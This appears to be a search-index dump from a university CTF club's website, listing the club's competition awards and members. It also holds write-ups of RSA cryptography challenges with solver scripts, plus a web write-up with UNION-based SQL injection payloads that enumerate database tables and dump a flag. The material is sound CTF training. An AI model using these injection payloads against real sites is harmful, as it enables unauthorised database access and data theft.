\u5730\u70b9\uff1a\u6211\u89c9\u5f97\u4e3b\u529e\u65b9\u5f88\u6709\u5fc5\u8981\u5b66\u4e60\u4e00\u4e0b\u5dee\u65c5\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u673a\u7968\u592a\u8d35\u98de\u4e0d\u4e86\u6c88\u9633 [2023/06/24] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\uff08\u534e\u4e1c\u5357\u5206\u533a\u9009\u62d4\u8d5b\uff09\uff0c\u56e2\u4f53\u4e00\u7b49\u5956\uff08\u664b\u7ea7\u603b\u51b3\u8d5b\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/06/03] - 2023\u5e74\u798f\u5efa\u7701\u7b2c\u56db\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u5168\u56fd\u5927\u5b66\u751f\u8d5b\u9053\uff09\u521d\u8d5b\u5168\u7701\u7b2c\u4e00/\u51b3\u8d5b\u4e09\u7b49\u5956\uff08\u4e0b\u534a\u573a\u5165\u573a\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/05/xx-06-xx] - \u67d0\u884c\u52a8\uff0c\u4fdd\u5bc6 [2023/05/29] - 2023\u5e74\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u653b\u9632\u8d5b \u7b2c24\u540d \u5730\u70b9\uff1a\u80fd\u8fdb\u7ebf\u4e0b\uff0c\u4f46\u7ecf\u8d39\u4e0d\u591f\uff0c\u6240\u4ee5\u5c31\u6ca1\u53bb\u4e86\uff08 [2023/05/06] - 2023\u5e74\u9996\u5c4a\u201c\u76d8\u53e4\u77f3\u676f\u201d\u5168\u56fd\u7535\u5b50\u6570\u636e\u53d6\u8bc1\u5927\u8d5b \u7b2c61\u540d\uff08\u5dee1\u540d\u8fdb\u7ebf\u4e0b\uff09 \u5730\u70b9\uff1a\u7ebf\u4e0a\uff0c\u5982\u679c\u8fdb\u7684\u8bdd\u5c31\u80fd\u53bb\u5357\u4eac\u4e86\uff0c\u8fd9\u6ce2\u662f\u8bbe\u5907\u95ee\u9898 [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b\uff0838/50\uff0cCodeMonster\uff09\uff0cx1aoB1n \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 
\u534a\u51b3\u8d5b\uff0813/109\u540d\uff0cCodeMonster\uff09\uff0c\u664b\u7ea7\u603b\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/01/10] - 2023\u5e74\u7b2c\u56db\u5c4a\u201c\u957f\u57ce\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e00\u8d5b\u533a\uff0c\u56e2\u4f53\u4e09\u7b49\u5956 \uff08FUCK U, COVID-19/\ud83d\udc47\uff09
"},{"location":"award/#2022","title":"2022","text":" [2022/10/??] - 2022\u5e74\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u5ba3\u4f20\u5468\u798f\u5efa\u7701\u7b2c\u4e09\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u8d5b\u9053\uff09 \u4f18\u79c0\u5956\uff08CodeMonster/XMUTSEC\uff09 \u5730\u70b9\uff1a\u798f\u5dde [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u4e2a\u4eba\u91d1\u724c \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u7ebf\u4e0a [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u56e2\u4f53\u4e8c\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] 
- \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u2014\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u603b\u51b3\u8d5b \u56e2\u4f53\u4e09\u7b49\u5956 \u7ebf\u4e0a [2022/06/28] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b \u534e\u4e1c\u5357\u8d5b\u533a \u56e2\u4f53\u4e00\u7b49\u5956 \u7ebf\u4e0a "},{"location":"award/#2021","title":"2021","text":" [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u6559\u80b2\u884c\u4e1a\u653b\u9632\u8d5b\u9053\uff0c\u9632\u5b88\u65b9\u7b2c\u4e00\u540d \u7ebf\u4e0a [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u9ed1\u76fe\u8d5b\u9053\uff0c\u9ad8\u6821\u7ec4\u7b2c\u4e09\u540d\u3001\u7b2c\u4e09\u540d \u5730\u70b9\uff1a\u798f\u5dde \uff08FUCK U, COVID-19/\ud83d\udc46\uff09
"},{"location":"award/#2020","title":"2020","text":" [2020/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e00\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2020/??/??] - \u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde "},{"location":"award/#2019","title":"2019","text":" [2019/??/??] - X-NUCA \u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b \u7b2c 23 \u540d [2019/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u7701\u8d5b \u4e00\u7b49\u5956 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u56db\u5ddd\uff0c\u6210\u90fd\u5e02\u6210\u534e\u533a\u5efa\u8bbe\u5317\u8def\u4e00\u6bb558\u53f7\u4e16\u8302\u6210\u90fd\u8302\u5fa1\u9152\u5e97\uff084F\u5927\u5bb4\u4f1a\u5385\uff09 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u534e\u4e1c\u5357\u8d5b\u533a\u534a\u51b3\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u59d1\u82cf\u533a\u5e73\u6c5f\u65b0\u57ce\u82cf\u7ad9\u8def1588\u53f7\uff0c\u7ef4\u4e5f\u7eb3\u9152\u5e97\uff08\u82cf\u5dde\u706b\u8f66\u7ad9\u5317\u5e7f\u573a\u5e97\uff09\u4e09\u697c\u8096\u90a6\u5385 [2019/??/??] 
- \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e94\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u9ad8\u6821\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u7ba1\u7406\u8fd0\u7ef4\u6311\u6218\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u897f\u5b89 [2019/??/??] - \u201c\u9ec4\u9e64\u676f\u201d\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u4e0e\u521b\u65b0\u5cf0\u4f1a\u66a8\u7f51\u7edc\u5b89\u5168\u670d\u52a1\u4e0e\u521b\u65b0\u80fd\u529b\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6b66\u6c49 [2019/??/??] - \u897f\u6e56\u8bba\u5251\u4e2d\u56fd\u676d\u5dde\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6d59\u6c5f "},{"location":"award/#2018","title":"2018","text":" [2018/12/28] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/12/07] - \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u5317\u4eac\uff0c\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66 [2018/06/09] - \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u4f1a\u8bae\u4e2d\u5fc3 [2018/05/11] - 2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/04/26] - 2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6d59\u6c5f\u676d\u5dde\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2018/03/10] - *CTF 2018 97th 
[2018/03/10] - N1CTF 2018 83th [2018/??/??] - HITB-XCTF GSEC CTF 2018 Final\uff08Member\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u65b0\u52a0\u5761\uff08Singapore\uff09\uff0cNational University of Singapore "},{"location":"award/#2017","title":"2017","text":" [2017/11/26] - \u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u4e00\u7b49\u5956\uff08\u5168\u7701\u7b2c\u4e8c\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/11/23] - 360 SRC\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\uff08\u798f\u5dde\u7ad9\uff09 \u7efc\u5408\u79ef\u5206\u7b2c4\u540d [2017/11/10] - HCTF 2017 58th \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/10/27] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/04/22] - 2017\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u201c\u6606\u4ed1\u4e2d\u9510\u676f\u201d\u4f01\u4e1a\u8d5b \u51a0\u519b \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde\uff0c\u798f\u5dde\u5927\u5b66 "},{"location":"award/#2016","title":"2016","text":" [2016/12/11] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2016/06/09] - \u534f\u4f1a\u6210\u7acb "},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":" rYu1nser (IceCliffs) - \u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0c\u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0821-22\u534f\u4f1a\u4f1a\u957f\uff09 "},{"location":"member/#2020-2021","title":"2020-2021","text":" me7eorite - \uff08\u795e\uff09 x1aoB1n\uff08\u7c73\u536b\u5175\uff09 - 
\u539f\u795e60\u7ea7+\u661f\u7a79\u94c1\u905370\u7ea7\uff0820-21\u534f\u4f1a\u4f1a\u957f\uff09 \u6843\u5b50\u4e4c\u9f99 whisper "},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":" White - \u4e0d\u53ef\u7ed3\u7f18 \u5f92\u589e\u5bc2\u5bde Alienworm - \u8fd8\u6ca1\u627e\u5230\u95e8\u7684ctf\u9009\u624b Southseast - \u8346\u68d8\u523a\u7a7f\u6211\u7684\u811a\u638c\u8def\u574e\u5777\u800c\u6f2b\u957f\u3002 Cosmos - \u4eba\u751f\u5982\u9006\u65c5,\u6211\u4ea6\u662f\u884c\u4eba\u3002 Nepire - \u53a6\u822a\u516c\u5b50:\u4e00\u4efd\u4ee3\u7801\u5343\u4e24\u884c,\u79d1\u5b66\u4e0a\u7f51\u6211\u6700\u5f3a,\u8d5b\u540e\u79d2\u9898\u7406\u6c14\u58ee,\u633a\u8fdb\u51b3\u8d5b\u558a\u51c9\u51c9\u3002 \u8c46\u6d46\u6cb9\u6761 - \u5fd7\u5728\u5c71\u9876\u7684\u4eba\uff0c\u4e0d\u4f1a\u8d2a\u5ff5\u5c71\u8170\u7684\u98ce\u666f\u3002 SweetPotato - \u6211\u80fd\u541e\u4e0b\u73bb\u7483\u800c\u4e0d\u4f24\u8eab\u4f53 "},{"location":"member/#2017-2018","title":"2017-2018","text":" Sheldon - \u4eba\u751f\u4e0d\u5982\u610f,\u5341\u6709\u516b\u4e5d\uff0817-18\u534f\u4f1a\u4f1a\u957f\uff09 Saltyfishy - \u4eba\u5982\u679c\u6ca1\u6709\u68a6\u60f3\uff0c\u90a3\u53ef\u592a\u8212\u670d\u4e86\uff01 \u5f20\u52a8\u4e4b - \u5165\u95e8\u7ea7ctf\u9009\u624b "},{"location":"member/#2016-2017","title":"2016-2017","text":" PeterZ - \u4e00\u53ea\u6c89\u8ff7\u4ee3\u7801\u7684\u81ea\u7531\u9e70\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-17\u534f\u4f1a\u4f1a\u957f\uff09 Xishir - A code monster.\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-18\u534f\u4f1a\u526f\u4f1a\u957f\uff09 l1nk3r - \u613f\u4f60\u51fa\u8d70\u534a\u751f\u5f52\u6765\u4ecd\u662f\u5c11\u5e74 backCover7 - Light up the Night! Jaken - River flows in you. \u6ce1\u9762 - \u552f\u5229\u662f\u56fe ju5tw4nty0u - Nothing is impossible to a willing heart. "},{"location":"ctfnotes/CTF-CPYPTO-2/","title":"CTF CPYPTO happy","text":"\u4e0b\u8f7d\u4e0b\u6765\u9644\u4ef6
('c=', '0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9eL') ('e=', '0x872a335')
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#q-qp3-1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","title":"q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586","text":"","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CPYPTO-2/#qp-q-p2-1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","title":"qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594","text":"\u7531\u4e8e0x\u5f00\u5934\u6ca1\u6709L\uff0c\u5148\u628aL\u53bb\u6389
\u4f7f\u7528gmpy2 \u7f16\u5199python\u811a\u672c
import gmpy2\nimport sympy\nfrom Crypto.Util.number import *\nc = 0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e\n\ne = 0x872a335\n\nk1=1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586\nk2 =gmpy2.mpz(k1)\nk2=1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594\n\np=sympy.Symbol('p')\nq=sympy.Symbol('q')\nsolved_value=sympy.solve([q + q*p**3 - k1,q*p + q*p**2 -k2], [p,q])\nprint(solved_value)\np=1158310153629932205401500375817\nq=827089796345539312201480770649\n\nd = gmpy2.invert(e,(p-1)*(q-1))\nm = gmpy2.powmod(c,d,p*q)\nprint(long_to_bytes(m))\n
\u5f97\u5230flag
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-1/","title":"ez_rsa:","text":"\u4e0b\u8f7d\u9644\u4ef6\uff1a
\u7528\u7f16\u5199python\u4ee3\u7801\uff0c\u56e0\u4e3aRSA\u53ef\u9006 :
p = 1325465431\n\nq = 152317153\n\ne = 65537\n\nn = p*q\n\nL = (p-1)*(q-1)\n\nd = pow(e,-1,L)\n\nprint(d)\n
\u89e3\u51faD=43476042047970113
\u518d\u7ecf\u8fc7md5\u52a0\u5bc6\u5f97\u5230flag
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-3/","title":"RSA\u5171\u6a21\uff1a","text":"\u9644\u4ef6.py\uff1a
from gmpy2 import *\n\nfrom Crypto.Util.number import *\n\n\nflag = '***************'\n\np = getPrime(512)\n\nq = getPrime(512)\n\nm1 = bytes_to_long(bytes(flag.encode()))\n\n\nn = p*q\n\ne1 = getPrime(32)\n\ne2 = getPrime(32)\n\nprint()\n\nflag1 = pow(m1,e1,n)\n\nflag2 = pow(m1,e2,n)\n\nprint('flag1= '+str(flag1))\n\nprint('flag2= '+str(flag2))\n\nprint('e1= ' +str(e1))\n\nprint('e2= '+str(e2))\n\nprint('n= '+str(n))\n\n\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\n\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\n\ne1= 3247473589\n\ne2= 3698409173\n\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n
python\u811a\u672c
from gmpy2 import *\nfrom Crypto.Util.number import *\n\nflag1= 100156221476910922393504870369139942732039899485715044553913743347065883159136513788649486841774544271396690778274591792200052614669235485675534653358596366535073802301361391007325520975043321423979924560272762579823233787671688669418622502663507796640233829689484044539829008058686075845762979657345727814280\nflag2= 86203582128388484129915298832227259690596162850520078142152482846864345432564143608324463705492416009896246993950991615005717737886323630334871790740288140033046061512799892371429864110237909925611745163785768204802056985016447086450491884472899152778839120484475953828199840871689380584162839244393022471075\ne1= 3247473589\ne2= 3698409173\nn= 103606706829811720151309965777670519601112877713318435398103278099344725459597221064867089950867125892545997503531556048610968847926307322033117328614701432100084574953706259773711412853364463950703468142791390129671097834871371125741564434710151190962389213898270025272913761067078391308880995594218009110313\n\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\ns = egcd(e1,e2)\ns1 = s[1]\ns2 = s[2]\nm = pow(flag1,s1,n)*pow(flag2,s2,n) % n\n# print(m)\nflag = long_to_bytes(m)\nprint(flag)\n
\u6c42\u5f97NSSCTF{xxxxx**xxxxx}
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":"\u9644\u4ef6\u63d0\u793a\uff1a\u5171\u4eab\u7d20\u6570
from Crypto.Util.number import * from gmpy2 import *
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-4/#from-flag-import","title":"from flag import *","text":"from Crypto.Util.number import *\nfrom flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n\n# m = bytes_to_long(flag)\n\n# c = pow(m, e, n1)\n\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\n\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n
\u7f16\u5199\u811a\u672c
from Crypto.Util.number import *\nfrom gmpy2 import *\n# from flag import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\n# m = bytes_to_long(flag)\n# c = pow(m, e, n1)\n# c = pow(c, e, n2)\n\n# print(\"c = %d\" % c)\n\n# output\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\n\np=GCD(n1,n2)\nq1=n1//p\nq2=n2//p\n\nphi1=(p-1)*(q1-1)\nphi2=(p-1)*(q2-1)\n\nd1=gmpy2.invert(e,phi1)\nd2=gmpy2.invert(e,phi2)\nc1=pow(c,d2,n2)\nm=pow(c1,d1,n1)\nflag = long_to_bytes(m)\nprint(flag)\n
\u5f97flag\uff1a
SangFor{qSccmm1WrgvIg2Uq_cZhmqNfEGTz2GV8}
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-CRYPTO-5/","title":"[\u9e64\u57ce\u676f 2021]A_CRYPTO","text":"4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
\u5148rot 13
\u5f974B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
\u518dbase16
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
\u518dbase32
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
\u518dbase64
\u5f97W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
\u6700\u540e\u5728https://gchq.github.io/CyberChef/\u4e0a\u8f6cbase85
\u5f97
","tags":["\u7b2c\u4e8c\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-WEB-2/","title":"easy_sql","text":"title\u63d0\u793a\u53c2\u6570\u662fwllm
order by\u67e5\u770b\u6709\u51e0\u5217
\u5f97\u52303\u5217
\u6539wllm=-1
?wllm=-1\u2019 union select 1,2,3 --+
\u5f97\u52302,3
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+
/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
\u5f97\u5230flag
","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/","title":"CTF WEB wp-1","text":"","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/CTF-Web-1/#do_you_konw_http","title":"Do_you_konw_http","text":"\u63d0\u793a\u4fee\u6539user agent \u4e3aWLLM
\u4f7f\u7528burp\u6293\u5305 \u7136\u540esend \u5230 repeater\u4e2d \u5728repeater\u4e2d\u4fee\u6539\u4e3aWLLM
\u5f97\u5230
\u63d0\u793a\u6709\u4e2aa.php
\u89e3\u9664\u62e6\u622a\u540e\u8fdb\u5165\u5230a.php
\u8981\u5c06\u5730\u5740\u6539\u4e3a\u672c\u5730\u7684\u56de\u73af\u5730\u5740\uff0c\u4e5f\u5c31\u662f127.0.0.1
\u4f7f\u7528fakeip\u63d2\u4ef6\u8fdb\u884c\u4fee\u6539ip
\u663e\u793asuccess\uff0c\u5e76\u53d1\u73b0secretttt.php
\u8fdb\u5165\u5230secretttt.php \u5f97\u5230flag
","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/","title":"RSA\u7b97\u6cd5\u539f\u7406","text":"\u672c\u6587\u501f\u9274\u4e86https://en.wikipedia.org/wiki/RSA_(cryptosystem) \u4e2d\u7684\u8d44\u6599\u548c\u4e9b\u56fe\u7247
